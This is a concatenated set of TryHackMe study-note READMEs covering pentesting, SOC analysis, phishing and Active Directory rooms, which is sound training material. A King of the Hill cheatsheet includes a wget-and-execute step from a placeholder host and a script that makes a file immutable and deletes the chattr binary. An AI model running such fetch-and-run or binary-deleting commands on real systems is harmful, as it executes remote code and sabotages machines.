19 | - **`WPA2-EAP`**: Wifi networks that you authenticate to by providing a username and password, which is sent to a RADIUS server.
20 | - **`RADIUS`**: A server for authenticating clients, not just for wifi.
21 |
--------------------------------------------------------------------------------
/Modules/Privilege Escalation/README.md:
--------------------------------------------------------------------------------
1 | # [`Privilege Escalation`](https://tryhackme.com/module/privilege-escalation)
2 | ### - Learn the fundamental techniques that will allow you to elevate account privileges in Linux and windows systems.
3 | - Privilege escalation allows you to increase your rights on the target system.
4 | - Privilege escalation is the path that will take you from a limited user account to complete system dominance.
5 | - This module covers effective techniques you can use to increase the privilege level of the user you have on the target system.
6 | - Techniques used in Linux and Windows are covered separately with examples you can face in CTFs, certification exams, or penetration testing engagements.
7 |
8 | ---
9 |
10 | ## `VIP` - [What the Shell?](https://tryhackme.com/jr/introtoshells)
11 | #### An introduction to sending and receiving (reverse/bind) shells when exploiting target machines.
12 |
13 | ## `Free` - [Linux PrivEsc](https://tryhackme.com/jr/linprivesc)
14 | #### Learn the fundamentals of Linux privilege escalation.
15 | - From enumeration to exploitation, get hands-on with over 8 different privilege escalation techniques.
16 |
17 | ## `VIP` - [Windows Privilege Escalation](https://tryhackme.com/jr/windowsprivesc20)
18 | #### Learn the fundamentals of Windows privilege escalation techniques.
19 |
--------------------------------------------------------------------------------
/Teaching/README.md:
--------------------------------------------------------------------------------
1 | # [Teaching ~ Getting Started](https://docs.tryhackme.com/docs/teaching/teaching-getting-started)
2 | ## Getting Started with Teaching on TryHackMe#
3 | ### TryHackMe is an online platform that provides virtual labs and provides teaching content for Cybersecurity training; helping you focus on teaching whilst we take care of the tedious setup and content creation process.
4 | ### We make a difference by having our content designed to attract young talent by providing the learners and teachers with benefits such as:
5 |
6 |
| Gamified | 18 |On-Demand | 19 |Class Ready | 20 |Analytics | 21 |
| Use scenario based, challenge-led teaching content. | 24 |Students can access all content anywhere, on any device. | 25 |Choose & repurpose courses that align with your objectives. | 26 |Track student progress and identify talent. | 27 |
[Steel Mountain](https://tryhackme.com/room/steelmountain)
2 |
3 | 
4 |
5 | ---
6 |
7 | 
8 | - [ ] [Steel Mountain](https://tryhackme.com/room/steelmountain)
9 | > ## Hack into a Mr. Robot themed Windows machine.
10 | - Use metasploit for initial access,
11 | utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.
12 | - [x] Task 1 [Introduction](#task-1--introduction)
13 | - [X] Task 2 [Initial Access](#task-2--initial-access)
14 | - [x] Task 3 [Privilege Escalation](#task-3--privilege-escalation)
15 | - [x] Task 4 [Access and Escalation Without Metasploit](#task-4--access-and-escalation-without-metasploit)
16 |
17 | ---
18 |
19 | - # Task 1 Introduction
20 | - ## Answer the questions below
21 | - ### Deploy the machine. Who is the employee of the month?
22 | - #### Answer
23 |
24 | ---
25 |
26 | - # Task 2 Initial Access
27 |
28 | ---
29 |
30 | - # Task 3 Privilege Escalation
31 |
32 | ---
33 |
34 | - # Task 4 Access and Escalation Without Metasploit
35 |
36 | ---
37 |
38 | - [TryHackMe - Steel Mountain Walkthrough - Manual Windows Exploitation](https://www.youtube.com/watch?v=BzmljZkgeSs&ab_channel=HackerSploit)
39 |
--------------------------------------------------------------------------------
/Learning Path/CompTIA Pentest+/Network-based vulnerabilities/README.md:
--------------------------------------------------------------------------------
1 | # Network-based vulnerabilities
2 | > ## This section will start you off by exploring networking basics.
3 | > ## You will then move on to enumerating and exploiting a variety of different network services.
4 | > ## When you've grasped the basics, you'll put your knowledge by exploiting a Linux Samba share.
5 | > - [X] [Introductory Networking]()
6 | > - [X] [Network Services]()
7 | > - [X] [Network Services 2]()
8 | > - [X] [Kenobi]()
9 |
10 | ---
11 |
12 | - ## [Introductory Networking](https://tryhackme.com/jr/introtonetworking)
13 | > 
14 | > ### An introduction to networking theory and basic networking tools
15 |
16 | - ## [Network Services](https://tryhackme.com/jr/networkservices)
17 | > 
18 | > ### Learn about, then enumerate and exploit a variety of network services and misconfigurations.
19 |
20 | - ## [Network Services 2](https://tryhackme.com/jr/networkservices2)
21 | > 
22 | > ### Enumerating and Exploiting More Common Network Services & Misconfigurations
23 |
24 | - ## [Kenobi](https://tryhackme.com/room/kenobi)
25 | > 
26 | > ### Walkthrough on exploiting a Linux machine.
27 | > ### Enumerate Samba for shares, manipulate a vulne
28 |
--------------------------------------------------------------------------------
/Room/CC: Pen Testing/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [CC: Pen Testing](https://tryhackme.com/room/ccpentesting)
4 | > A crash course on various topics in penetration testing
5 | - [ ] Task 1 Introduction
6 | - [ ] Task 2 [Section 1 - Network Utilities] - nmap
7 | - [ ] Task 3 [Section 1 - Network Utilities] - Netcat
8 | - [ ] Task 4 [Section 2 - Web Enumeration] - gobuster
9 | - [ ] Task 5 [Section 2 - Web Enumeration] - nikto
10 | - [ ] Task 6 [Section 3 - Metasploit]: Intro
11 | - [ ] Task 7 [Section 3 Metasploit]: Setting Up
12 | - [ ] Task 8 [Section 3 - Metasploit]: - Selecting a module
13 | - [ ] Task 9 [Section 3 - Metasploit]: meterpreter
14 | - [ ] Task 10 [Section 3 - Metasploit]: Final Walkthrough
15 | - [ ] Task 11 [Section 4 - Hash Cracking]: Intro
16 | - [ ] Task 12 [Section 4 - Hash Cracking]: Salting and Formatting
17 | - [ ] Task 13 [Section 4 - Hash Cracking]: hashcat
18 | - [ ] Task 14 [Section 4 - Hash Cracking]: John The Ripper
19 | - [ ] Task 15 [Section 5 - SQL Injection]: Intro
20 | - [ ] Task 16 [Section 5 - SQL Injection]: sqlmap
21 | - [ ] Task 17 [Section 5 - SQL Injection]: A Note on Manual SQL Injection
22 | - [ ] Task 18 [Section 5 - SQL Injection]: Vulnerable Web Application
23 | - [ ] Task 19 [Section 6 - Samba]: Intro
24 | - [ ] Task 20 [Section 6 - Samba]: smbmap
25 | - [ ] Task 21 [Section 6 - Samba]: smbclient
26 | - [ ] Task 22 [Section 6 - Samba]: A note about impacket
27 | - [ ] Task 23 [Miscellaneous]: A note on privilege escalation
28 | - [ ] Task 24 [Section 7 - Final Exam]: Good Luck :D
29 |
--------------------------------------------------------------------------------
/Modules/Phishing/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # [Phishing](https://tryhackme.com/module/phishing)
4 |
5 | ### Learn how to analyze and defend against phishing emails.
6 | ### Investigate real-world phishing attempts using a variety of techniques.
7 |
8 | ##### In this module, you will learn to analyze various phishing attacks hands-on.
9 | From examining an email's source properties to reviewing malicious phishing attachments, you will investigate real-world examples of attacks in the industry.
10 | You will also discover how adversaries launch phishing campaigns and learn how you can defend your organization against them.
11 |
12 |
13 | ---
14 |
15 | ## `Free` - [Phishing Analysis Fundamentals](https://tryhackme.com/jr/phishingemails1tryoe)
16 | ### Learn all the components that make up an email.
17 |
18 |
19 | ---
20 |
21 | ## `Free` - [Phishing Emails in Action](https://tryhackme.com/jr/phishingemails2rytmuv)
22 | ### Learn the different indicators of phishing attempts by examining actual phishing emails.
23 |
24 |
25 | ---
26 |
27 | ## `VIP` - [Phishing Analysis Tools](https://tryhackme.com/jr/phishingemails3tryoe)
28 | ### Learn the tools used to aid an analyst to investigate suspicious emails.
29 |
30 |
31 | ---
32 |
33 | ## `VIP` - [Phishing Prevention](https://tryhackme.com/jr/phishingemails4gkxh)
34 | ### Learn how to defend against phishing emails.
35 |
36 |
37 | ---
38 |
39 | 
40 | ## `VIP` - [The Greenholt Phish](https://tryhackme.com/jr/phishingemails5fgjlzxc)
41 | ### Use the knowledge attained to analyze a malicious email.
42 |
--------------------------------------------------------------------------------
/Learning Path/CompTIA Pentest+/Local-host vulnerabilities/README.md:
--------------------------------------------------------------------------------
1 | # Local-host vulnerabilities
2 | > ## Windows Active Directory (AD) environments dominate the corporate and governmental world's organizational networking structure.
3 | > ## This section will teach you the AD basics, how to attack Kerberos and a domain controller, followed by some post-exploitation techniques.
4 | > - [X] [Active Directory Basics]()
5 | > - [x] [Attacktive Directory]()
6 | > - [x] [Attacking Kerberos]()
7 | > - [ ] [Post-Exploitation Basics]()
8 |
9 | ---
10 |
11 | ## ✅ [Active Directory Basics](https://tryhackme.com/jr/activedirectorybasics)
12 | > 
13 | > ## Learn the basics of Active Directory and how it is used in the real world today
14 |
15 | ## ✅ [Attacktive Directory](https://tryhackme.com/jr/attacktivedirectory)
16 | > 
17 | > ## 99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?
18 |
19 | ## ✅ [Attacking Kerberos](https://tryhackme.com/jr/attackingkerberos)
20 | > 
21 | > ## Learn how to abuse the Kerberos Ticket Granting Service inside of a Windows Domain Controller
22 |
23 | ## [Post-Exploitation Basics](https://tryhackme.com/jr/postexploit)
24 | > 
25 | > ## Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom
26 |
--------------------------------------------------------------------------------
/Learning Path/CompTIA Pentest+/Penetration Testing Tools/README.md:
--------------------------------------------------------------------------------
1 | # Penetration Testing Tools
2 | > ## The following rooms will teach you how to use tools that are commonly used in the industry to perform penetration tests.
3 | > ## If you're going to be a pentester, you'll need to have these tools equipped in your toolkit.
4 |
5 | ---
6 |
7 | - ## Tutorial
8 | > 
9 | > #### Learn how to use a TryHackMe room to start your upskilling in cyber security.
10 |
11 |
12 | - ## Nmap
13 | > 
14 | > #### An in depth look at scanning with Nmap, a powerful network scanning tool.
15 |
16 |
17 | - ## Burp Suite: The Basics
18 | > 
19 | > #### An introduction to using Burp Suite for Web Application pentesting
20 |
21 |
22 | - ## Metasploit: Introduction
23 | > 
24 | > #### An introduction to the main components of the Metasploit Framework.
25 |
26 |
27 | - ## Nessus
28 | > 
29 | > #### Learn how to set up and use Nessus, a popular vulnerability scanner.
30 |
31 |
32 | - ## Hydra
33 | > 
34 | > #### Learn about and use Hydra, a fast network logon cracker, to bruteforce and obtain a website's credentials.
35 |
--------------------------------------------------------------------------------
/Learning Path/SOC Level 1/Network Security and Traffic Analysis/Brim/cheat.md:
--------------------------------------------------------------------------------
1 | ### File: task4-sample-b.pcap
2 | #### Exercise: Threat Hunting with Brim | Malware C2 Detection
3 |
4 | Investigate the files. What is the name of the detected GIF file?
5 |
6 | - `filename!=null | cut _path, tx_hosts, rx_hosts, conn_uids, mime_type, filename, md5, sha1`
7 |
8 |
9 | Investigate the conn logfile. What is the number of the identified city names?
10 |
11 | - `_path==”conn” | put classnet := network_of(id.resq_h) | cut geo.resq.region,geo.resp.city`
12 |
13 | Cities:
14 |
15 | - 1.Eppelborn
16 | - 2.Frankfurt am Main
17 |
18 | Investigate the Suricata alerts. What is the Signature id of the alert category “Potential Corporate Privacy Violation”?
19 |
20 | ---
21 |
22 | ### File:task6-malware-c2.pcap
23 | #### Exercise: Threat Hunting with Brim | Malware C2 Detection
24 |
25 | What is the name of the file downloaded from the CobaltStrike C2 connection?
26 |
27 | - `_path==”http” | cut id.orig_h, id.resp_h, id.resp_p, method, host, uri | uniq -c`
28 |
29 | 4564.exe
30 |
31 | What is the number of CobaltStrike connections using port 443?
32 |
33 | - `_path==”conn” | 104.168.44.45 | 443 | count()`
34 |
35 | 328
36 |
37 | There is an additional C2 channel in used the given case. What is the name of the secondary C2 channel?
38 |
39 | Icedid
40 |
41 | ---
42 |
43 | ### File: task7-crypto-mine.pcapng
44 | #### Exercise: Threat Hunting with Brim | Crypto Mining
45 |
46 | How many connections used port 19999?
47 |
48 | - `_path==”conn” | 19999 | count()`
49 |
50 | What is the name of the service used by port 6666?
51 |
52 | - `_path==”conn” | 6666 | cut service`
53 |
54 | What is the amount of transferred total bytes to “101.201.172.235:8888”?
55 |
56 | - `_path==”conn” | 101.201.172.235 | 8888`
57 |
58 | What is the detected MITRE tactic id?
59 |
60 | - `event_type==”alert”`
61 |
--------------------------------------------------------------------------------
/Learning Path/SOC Level 1/Network Security and Traffic Analysis/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # [Network Security and Traffic Analysis](#)
4 | ### Understand the core concepts of Network Security and Traffic Analysis to spot and probe network anomalies using industry tools and techniques.
5 |
6 | ---
7 |
8 | ## [Traffic Analysis Essentials](#)
9 | #### Learn Network Security and Traffic Analysis foundations and take a step into probing network anomalies.
10 |
11 | ## [Snort](#)
12 | #### Learn how to use Snort to detect real-time threats, analyse recorded traffic files and identify anomalies.
13 |
14 | ## [Snort Challenge - The Basics](#)
15 | #### Put your snort skills into practice and write snort rules to analyse live capture network traffic.
16 |
17 | ## [Snort Challenge - Live Attacks](#)
18 | #### Put your snort skills into practice and defend against a live attack
19 |
20 | ## [NetworkMiner](#)
21 | #### Learn how to use NetworkMiner to analyse recorded traffic files and practice network forensics activities.
22 |
23 | ## [Zeek](#)
24 | #### Introduction to hands-on network monitoring and threat detection with Zeek (formerly Bro).
25 |
26 | ## [Zeek Exercises](#)
27 | #### Put your Zeek skills into practice and analyse network traffic.
28 |
29 | ## [Brim](#)
30 | #### Learn and practice log investigation, pcap analysis and threat hunting with Brim.
31 |
32 | ## [Wireshark: The Basics](#)
33 | #### Learn the basics of Wireshark and how to analyse protocols and PCAPs.
34 |
35 | ## [Wireshark: Packet Operations](#)
36 | #### Learn the fundamentals of packet analysis with Wireshark and how to find the needle in the haystack!
37 |
38 | ## [Wireshark: Traffic Analysis](#)
39 | #### Learn the basics of traffic analysis with Wireshark and how to find anomalies on your network!
40 |
--------------------------------------------------------------------------------
/Learning Path/SOC Level 1/Cyber Defence Frameworks/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # [Cyber Defence Frameworks](#)
4 | ### Discover frameworks and policies that help establish a good security posture. Learn how organisations use these in defensive strategies.
5 |
6 | ---
7 |
8 | ### [Junior Security Analyst Intro](https://tryhackme.com/jr/jrsecanalystintrouxo)
9 | 
10 | #### Play through a day in the life of a Junior Security Analyst, their responsibilities and qualifications needed to land a role as an analyst.
11 |
12 | ---
13 |
14 | ### [Pyramid Of Pain](https://tryhackme.com/jr/pyramidofpainax)
15 | #### Learn what is the Pyramid of Pain and how to utilize this model to determine the level of difficulty it will cause for an adversary to change the indicators associated with them, and their campaign.
16 |
17 | ---
18 |
19 | ### [Cyber Kill Chain](https://tryhackme.com/jr/cyberkillchainzmt)
20 | #### The Cyber Kill Chain framework is designed for identification and prevention of the network intrusions. You will learn what the adversaries need to do in order to achieve their goals.
21 |
22 | ---
23 |
24 | ### [Unified Kill Chain](https://tryhackme.com/jr/unifiedkillchain)
25 | #### The Unified Kill Chain is a framework which establishes the phases of an attack, and a means of identifying and mitigating risk to IT assets.
26 |
27 | ---
28 |
29 | ### [Diamond Model](https://tryhackme.com/jr/diamondmodelrmuwwg42)
30 | #### Learn about the four core features of the Diamond Model of Intrusion Analysis: adversary, infrastructure, capability, and victim.
31 |
32 | ---
33 |
34 | ### [MITRE](https://tryhackme.com/jr/mitre)
35 | #### This room will discuss the various resources MITRE has made available for the cybersecurity community.
36 |
37 |
--------------------------------------------------------------------------------
/Room/Introduction to OWASP ZAP/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 |
4 | - [ ] [Introduction to OWASP ZAP](https://tryhackme.com/room/learnowaspzap)
5 | > Learn how to use OWASP ZAP from the ground up. An alternative to BurpSuite.
6 | - [x] Task 1 Intro to ZAP
7 | 
8 | - There’s a couple of feature benefits too with using OWASP ZAP over Burp Suite:
9 | - Automated Web Application Scan: This will automatically passively and actively scan a web application, build a sitemap, and discover vulnerabilities. This is a paid feature in Burp.
10 | - Web Spidering: You can passively build a website map with Spidering. This is a paid feature in Burp.
11 | - Unthrottled Intruder: You can bruteforce login pages within OWASP as fast as your machine and the web-server can handle. This is a paid feature in Burp.
12 | - No need to forward individual requests through Burp: When doing manual attacks, having to change windows to send a request through the browser, and then forward in burp, can be tedious. OWASP handles both and you can just browse the site and OWASP will intercept automatically. This is NOT a feature in Burp.
13 |
14 | - [x] Task 2 Disclaimer
15 | - [x] Task 3 Installation
16 | - [x] Task 4 How to perform an automated scan
17 | - [x] Task 5 Manual Scanning
18 | - [x] Task 6 Scanning an Authenticated Web Application
19 | - [x] Task 7 Brute-force Directories
20 | - [x] Task 8 Bruteforce Web Login
21 | - [x] Task 9 ZAP Extensions\
22 | > Let’s install the bugcrowd HUNT extensions for OWASP ZAP. This will passively scan for known vulnerabilities in web applications.
23 | - https://github.com/zaproxy/zap-extensions
24 | - https://github.com/bugcrowd/HUNT
25 | - [x] Task 10 Further Reading
26 |
--------------------------------------------------------------------------------
/Learning Path/Web Fundamentals/README.md:
--------------------------------------------------------------------------------
1 | # 🔰 [Web Fundamentals](https://tryhackme.com/path-action/web/join)
2 |
3 | 
4 |
5 | ### A pathway to web application security.
6 | - The aim of this path is to teach you how to attack web applications.
7 | - To successfully attack and exploit web applications, you need to understand how they work.
8 | - The first section (Web Fundamentals) will give you all the pre-requisite knowledge on this.
9 | - The second section (Security Tools) focuses on learning how to use Industry Standard tooling to interact with your targets.
10 | - The third section (Vulnerabilities) covers various vulnerabilities found in web applications today.
11 | - This section will go over root causes of these vulnerabilities and give you hands on experience on exploiting them.
12 | - The final section (Practise Makes Perfect) will help you apply what you've learnt in previous sections.
13 |
14 | ### After completing this path, you should be able to:
15 | * Understand web fundamentals
16 | * Major vulnerabilities explained
17 | * Learn industry-used tools
18 | * Web application assessments
19 |
20 | - 32 Hours
21 |
22 | - Easy
23 |
24 | ## The Learning Path
25 |
26 | - [x] [How The Web Works](how%20the%20web%20works)
27 | - To become a better hacker it's vital to understand the underlying functions of the world wide web and what makes it work.
28 |
29 | - [x] [Introduction to Web Hacking](Introduction%20to%20Web%20Hacking)
30 | - Get hands-on, learn about and exploit some of the most popular web application vulnerabilities seen in the industry today.
31 |
32 | - [x] [Burp Suite](Burp%20Suite)
33 | - Burp Suite is the industry standard tool for web application hacking, and is essential in any web penetration test
34 |
35 | - [x] [Web Hacking Fundamentals](Web%20Hacking%20Fundamentals)
36 | - Understand the core security issues with web applications, and learn how to exploit them using industry tools and techniques.
37 |
38 |
39 |
--------------------------------------------------------------------------------
/King of the Hill/Cheatsheet/KoTH Protect King.md:
--------------------------------------------------------------------------------
1 | # koth-protect-king
2 | A script to protect your king in KoTH
3 |
4 | # A script to protect your king
5 |
6 | ## Mode of use
7 |
8 | ```
9 | git clone https://github.com/MatheuZSecurity/koth-protect-king
10 | ```
11 |
12 | ```
13 | cd koth-protect-king && python3 -m http.server 80
14 | ```
15 |
16 | ## In KoTH Machine
17 |
18 | ```
19 | wget http://youripvpn/king.sh && chmod +x king.sh && ./king.sh
20 | ```
21 |
22 | #### then you just put your nick and the script already does all the work
23 |
24 | 
25 |
26 | #### NOICE: script updates will be made from time to time
27 |
28 | ---
29 |
30 | ```shell
31 | #!/usr/bin/env bash
32 | # A script to protect your king in KoTH
33 | # Created by @MatheuzSecurity
34 | # https://youtube.com/c/MatheuZSecurity
35 |
36 | if [[ $(id -u) -ne "0" ]]; then
37 | echo "[ERROR] You must run this script as root" >&2
38 | exit 1
39 | fi
40 |
41 | read -p "Put your nickname: " nick
42 |
43 | function protectKing() {
44 | echo $nick > /root/king.txt
45 | chmod 400 /root/king.txt
46 | chattr +i /root/king.txt
47 | set -o noclobber /root/king.txt
48 | }
49 |
50 | arr=('.' '..' '...' '....')
51 |
52 | for c in $(seq 1); do
53 | for elt in ${arr[*]}; do
54 | echo -ne "\r\033[<1>AProtecting your king $elt" && sleep 0.1;
55 | done
56 | done
57 |
58 | echo -ne "\n"
59 |
60 | message="Success! Your king has been protected! =D"
61 |
62 | for i in $(seq 1 ${#message}); do
63 | echo -ne "${message:i-1:1}"
64 | sleep 0.03
65 | done
66 |
67 | echo -ne "\n"
68 |
69 | clear
70 |
71 | function removeChattr(){
72 | rm /usr/bin/chattr
73 | }
74 |
75 | msg="[*] Success! Binary chattr removed! [*]"
76 |
77 | for i in $(seq 1 ${#msg}); do
78 | echo -ne "${msg:i-1:1}"
79 | sleep 0.03
80 | done
81 | echo -ne "\n"
82 |
83 | protectKing && removeChattr /
84 |
85 | echo -ne "\n"
86 | ```
87 |
--------------------------------------------------------------------------------
/Learning Path/Cyber Defense/MITRE/README.md:
--------------------------------------------------------------------------------
1 | 
2 | # [MITRE](https://tryhackme.com/room/mitre)
3 | 
4 | ### This room will discuss the various resources MITRE has made available for the cybersecurity community.
5 |
6 | ---
7 |
8 | - [x] Task 1 Introduction to MITRE
9 | - [x] Task 2 Basic Terminology
10 | - [x] Task 3 ATT&CK® Framework
11 | - [x] Task 4 CAR Knowledge Base
12 | - [x] Task 5 Shield Active Defense
13 | - [x] Task 6 MITRE D3FEND
14 | - [x] Task 7 ATT&CK® Emulation Plans
15 | - [x] Task 8 ATT&CK® and Threat Intelligence
16 | - [x] Task 9 Conclusion
17 |
18 | ---
19 |
20 |
21 | ---
22 |
23 | ## Task 1 Introduction to MITRE
24 |
25 | ---
26 |
27 | ## Task 2 Basic Terminology
28 |
29 | ---
30 |
31 | ## Task 3 ATT&CK® Framework
32 |
33 | ---
34 |
35 | ## Task 4 CAR Knowledge Base
36 |
37 | ---
38 |
39 | ## Task 5 Shield Active Defense
40 |
41 | ---
42 |
43 | ## Task 6 MITRE D3FEND
44 |
45 | What is this MITRE resource? Per the D3FEND website, this resource is
46 |
47 | #### "A knowledge graph of cybersecurity countermeasures."
48 |
49 | - [d3fend](https://d3fend.mitre.org/)
50 |
51 | D3FEND is still in beta and is funded by the Cybersecurity Directorate of the NSA.
52 |
53 | D3FEND stands for Detection, Denial, and Disruption Framework Empowering Network Defense.
54 |
55 | At the time of this writing, there are 408 artifacts in the D3FEND matrix. See the below image.
56 |
57 | ---
58 |
59 | ## Task 7 ATT&CK® Emulation Plans
60 | - [Adversary Emulation Library](https://github.com/center-for-threat-informed-defense/adversary_emulation_library)
61 | ---
62 |
63 | ## Task 8 ATT&CK® and Threat Intelligence
64 |
65 | ---
66 |
67 | ## Task 9 Conclusion
68 |
69 |
70 | ---
71 |
72 | - [TryHackMe | MITRE Room Walkthrough 2022](https://www.pyaeheinnkyaw.tech/tryhackme-mitre-room-writeup/)
73 |
--------------------------------------------------------------------------------
/Learning Path/Web Fundamentals/How The Web Works/README.md:
--------------------------------------------------------------------------------
1 |
2 | ## How The Web Works
3 |
4 | 
5 |
6 | ### To become a better hacker it's vital to understand the underlying functions of the world wide web and what makes it work.
7 |
8 | 
9 | - [x] [DNS in detail](https://tryhackme.com/room/dnsindetail)
10 | - Learn how DNS works and how it helps you access internet services.
11 | - [x] Task 1 What is DNS?
12 | - [x] Task 2 Domain Hierarchy
13 | - [x] Task 3 Record Types
14 | - [x] Task 4 Making A Request
15 | - [x] Task 5 Practical
16 |
17 | 
18 | - [x] [HTTP in detail](https://tryhackme.com/room/httpindetail)
19 | - Learn about how you request content from a web server using the HTTP protocol
20 | - [x] Task 1 What is HTTP(S)?
21 | - [x] Task 2 Requests And Responses
22 | - [x] Task 3 HTTP Methods
23 | - [x] Task 4 HTTP Status Codes
24 | - [x] Task 5 Headers
25 | - [x] Task 6 Cookies
26 | - [x] Task 7 Making Requests
27 |
28 | 
29 | - [x] [How websites work](https://tryhackme.com/room/howwebsiteswork)
30 | - To exploit a website, you first need to know how they are created.
31 | - [x] Task 1 How websites work
32 | - [x] Task 2 HTML
33 | - [x] Task 3 JavaScript
34 | - [x] Task 4 Sensitive Data Exposure
35 | - [x] Task 5 HTML Injection
36 |
37 | 
38 | - [x] [Putting it all together](https://tryhackme.com/room/puttingitalltogether)
39 | - Learn how all the individual components of the web work together to bring you access to your favourite web sites.
40 | - [x] Task 1 Putting It All Together
41 | - [x] Task 2 Other Components
42 | - [x] Task 3 How Web Servers Work
43 | - [x] Task 4 Quiz
44 |
45 |
--------------------------------------------------------------------------------
/Modules/Cyber Security Awareness/README.md:
--------------------------------------------------------------------------------
1 | 
2 | # [Cyber Security Awareness](https://tryhackme.com/module/cyber-security-awareness)
3 | ### Become cyber aware and protect yourself from common security attacks by working through interactive real-world scenarios.
4 | - You are at the heart of your organisation and play a key role in keeping it safe against cyber attacks.
5 | - Understand what it takes to be security conscious by walking through the most common attacks seen in the industry, and learn how to mitigate potential threats.
6 | - Become more security-aware and improve your cyber hygiene in this module.
7 |
8 | ---
9 |
10 | ## ✅ `Free` - [Security Awareness](https://tryhackme.com/room/securityawarenessintro)
11 | 
12 | > An introduction to security awareness; why its important, the impact of being attacked, different threat actors and basic account security.
13 | - [x] [Task 1 Introduction to Security Awareness]()
14 | - [x] [Task 2 Why Security Awareness is essential]()
15 | - [x] [Task 3 Data and account security]()
16 | - [x] [Task 4 Check if you've ever been part of a cyber breach]()
17 | - [x] [Task 5 Cyber threat actors]()
18 | - [x] [Task 6 Conclusion]()
19 |
20 | ---
21 |
22 | ## 🔶 `Free` - [Common Attacks](https://tryhackme.com/room/commonattacks)
23 | 
24 | > With practical exercises see how common attacks occur, and improve your cyber hygiene to stay safer online.
25 | - [ ] [Task 1 `Information` Introduction]()
26 | - [ ] [Task 2 `Common Attacks` Social Engineering]()
27 | - [ ] [Task 3 `Common Attacks` Social Engineering: Phishing]()
28 | - [ ] [Task 4 `Common Attacks` Malware and Ransomware]()
29 | - [ ] [Task 5 `Common Attacks` Passwords and Authentication]()
30 | - [ ] [Task 6 `Staying Safe` Multi-Factor Authentication and Password Managers]()
31 | - [ ] [Task 7 `Staying Safe` Public Network Safety]()
32 | - [ ] [Task 8 `Staying Safe` Backups]()
33 | - [ ] [Task 9 `Staying Safe` Updates and Patches]()
34 | - [ ] [Task 10 `Information` Conclusion]()
35 |
--------------------------------------------------------------------------------
/Learning Path/Complete Beginner/Linux Fundamentals/README.md:
--------------------------------------------------------------------------------
1 |
2 | ## Linux Fundamentals
3 |
4 | 
5 |
6 | ### Many servers and security tools use Linux. Learn how to use the Linux operating system, a critical skill in cyber security.
7 |
8 | - [Linux Fundamentals Part 1](https://tryhackme.com/room/linuxfundamentalspart1)
9 | - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal.
10 | - [x] Task 1 Introduction
11 | - [x] Task 2 A Bit of Background on Linux
12 | - [x] Task 3 Interacting With Your First Linux Machine (In-Browser)
13 | - [x] Task 4 Running Your First few Commands
14 | - [x] Task 5 Interacting With the Filesystem!
15 | - [x] Task 6 Searching for Files
16 | - [x] Task 7 An Introduction to Shell Operators
17 | - [x] Task 8 Conclusions & Summaries
18 | - [x] Task 9 Linux Fundamentals Part 2
19 |
20 | - [Linux Fundamentals Part 2](https://tryhackme.com/room/linuxfundamentalspart2)
21 | - Continue your learning Linux journey with part two. You will be learning how to log in to a Linux machine using SSH, how to advance your commands, file system interaction.
22 | - [x] Task 1 Introduction
23 | - [x] Task 2 Accessing Your Linux Machine Using SSH (Deploy)
24 | - [x] Task 3 Introduction to Flags and Switches
25 | - [x] Task 4 Filesystem Interaction Continued
26 | - [x] Task 5 Permissions 101
27 | - [x] Task 6 Common Directories
28 | - [x] Task 7 Conclusions and Summaries
29 | - [x] Task 8 Linux Fundamentals Part 3
30 |
31 | - [Linux Fundamentals Part 3](https://tryhackme.com/room/linuxfundamentalspart3)
32 | - Power-up your Linux skills and get hands-on with some common utilities that you are likely to use day-to-day!
33 | - [x] Task 1 Introduction
34 | - [x] Task 2 Deploy Your Linux Machine
35 | - [x] Task 3 Terminal Text Editors
36 | - [x] Task 4 General/Useful Utilities
37 | - [x] Task 5 Processes 101
38 | - [x] Task 6 Maintaining Your System: Automation
39 | - [x] Task 7 Maintaining Your System: Package Management
40 | - [x] Task 8 Maintaining Your System: Logs
41 | - [x] Task 9 Conclusions & Summaries
42 |
43 |
--------------------------------------------------------------------------------
/Modules/Compromising Active Directory/README.md:
--------------------------------------------------------------------------------
1 | # [Compromising Active Directory](https://tryhackme.com/module/hacking-active-directory)
2 | ### Learn and exploit Active Directory networks through core security issues stemming from misconfigurations.
3 | #### Active Directory (AD) is used by approximately 90% of the Global Fortune 1000 companies.
4 | If an organisation's estate uses Microsoft Windows, you are almost guaranteed to find AD.
5 | Since AD is used for Identity and Access Management of the entire estate, it holds the keys to the kingdom, making it a very likely target for attackers.
6 | This module will teach you the basics of AD and take you on the typical journey of compromising AD during a red team.
7 | You will learn to breach AD, enumerate AD, exploit AD, and finally also deploy persistence through AD.
8 |
9 | - ✅ | `Free` | Active Directory Basics
10 | - `Free` | Breaching Active Directory
11 | - `Free` | Enumerating Active Directory
12 | - `VIP` | Lateral Movement and Pivoting
13 | - `VIP` | Exploiting Active Directory
14 | - `VIP` | Persisting Active Directory
15 |
16 | ---
17 |
18 | ## ✅ | `Free` | [Active Directory Basics](https://tryhackme.com/jr/winadbasics)
19 | - This room will introduce the basic concepts and functionality provided by Active Directory.
20 |
21 | ## `Free` | [Breaching Active Directory](https://tryhackme.com/jr/breachingad)
22 | - This network covers techniques and tools that can be used to acquire that first set of AD credentials that can then be used to enumerate AD.
23 |
24 | ## `Free` | [Enumerating Active Directory](https://tryhackme.com/jr/adenumeration)
25 | - This room covers various Active Directory enumeration techniques, their use cases as well as drawbacks.
26 |
27 | ## `VIP` | [Lateral Movement and Pivoting](https://tryhackme.com/jr/lateralmovementandpivoting)
28 | - Learn about common techniques used to move laterally across a Windows network.
29 |
30 | ## `VIP` | [Exploiting Active Directory](https://tryhackme.com/jr/exploitingad)
31 | - Learn common AD exploitation techniques that can allow you to reach your goal in an AD environment.
32 |
33 | ## `VIP` | [Persisting Active Directory](https://tryhackme.com/jr/persistingad)
34 | - Learn about common Active Directory persistence techniques that can be used post-compromise to ensure the blue team will not be able to kick you out during a red team exercise..
35 |
--------------------------------------------------------------------------------
/Learning Path/Complete Beginner/Basic Computer Exploitation.md:
--------------------------------------------------------------------------------
1 |
`VIP` [Network Security Solutions](https://tryhackme.com/jr/redteamnetsec)
15 | > ## Learn about and experiment with various IDS/IPS evasion techniques, such as protocol and payload manipulation.
